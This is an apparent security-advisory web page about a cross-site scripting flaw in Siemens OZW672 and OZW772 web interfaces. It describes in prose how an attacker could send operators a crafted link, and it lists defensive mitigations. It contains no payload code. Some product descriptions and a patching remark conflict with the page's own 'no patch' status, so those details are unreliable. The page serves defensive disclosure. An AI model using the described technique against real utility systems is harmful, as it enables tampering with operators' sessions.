OTPulse
FeedAboutContact

Siemens OZW672 and OZW772 XSS Vulnerability

Monitor4.7ICS-CERT ICSA-16-019-01Oct 22, 2016
Attack VectorNetwork
Auth RequiredNone
ComplexityLow
User InteractionRequired
Summary

Siemens OZW672 and OZW772 outdoor equipment controllers contain a cross-site scripting (XSS) vulnerability in the web interface. An attacker can inject malicious scripts that execute in the context of an authenticated user's browser, potentially allowing unauthorized actions or data theft.

What this means
What could happen
An attacker could trick an authorized operator into clicking a malicious link that executes commands in their browser session, potentially allowing unauthorized changes to device configuration or theft of session credentials. This vulnerability affects outdoor equipment control systems used in distribution networks.
Who's at risk
Water and electric utilities operating Siemens OZW672 or OZW772 outdoor equipment controllers (remote terminal units for switchgear, capacitor banks, or recloser control in distribution networks). Primary concern is for engineering and operations staff who access these devices via the web interface.
How it could be exploited
An attacker crafts a malicious URL containing JavaScript payload and sends it to an operator via email or social engineering. When the operator clicks the link while authenticated to the OZW web interface, the script executes in their browser session, allowing the attacker to perform actions as that operator (change setpoints, disable alarms, etc.).
Prerequisites
  • Network access to the OZW web interface (typically HTTPS port 443)
  • Operator must be authenticated to the web interface
  • Operator must click attacker-controlled link while session is active
remotely exploitablerequires user interaction (link click)affects remote control of outdoor distribution equipmentno patch available from vendor
Exploitability
Low exploit probability (EPSS 0.2%)
Affected products (2)
2 EOL
ProductAffected VersionsFix Status
OZW672: <V6.00<V6.00No fix (EOL)
OZW772: <V6.00<V6.00No fix (EOL)
Remediation & Mitigation
0/5
Do now
0/3
HARDENINGImplement network-based XSS filtering or Web Application Firewall (WAF) rules to detect and block malicious script payloads in requests to OZW web interfaces
HARDENINGRestrict network access to OZW web interfaces to specific authorized IP addresses or engineering VLANs; do not expose directly to the internet
WORKAROUNDTrain operators and engineering staff to not click on suspicious links in emails or instant messages, especially those referencing OZW device management URLs
Schedule — requires maintenance window
0/1

Patching may require device reboot — plan for process interruption

HARDENINGLog all web interface access to OZW devices and monitor for suspicious activity or unusual parameter values
Mitigations - no patch available
0/1
The following products have reached End of Life with no planned fix: OZW672: <V6.00, OZW772: <V6.00. Apply the following compensating controls:
HARDENINGConsider replacing OZW672/OZW772 units with newer Siemens outdoor equipment controllers that have patch support and modern web security controls
View full CISA ICS-CERT advisory
↑↓ Navigate · Esc Close
API: /api/v1/advisories/0f4e646d-b245-4303-aed9-3df1d2d8a9ac
Siemens OZW672 and OZW772 XSS Vulnerability | CVSS 4.7 - OTPulse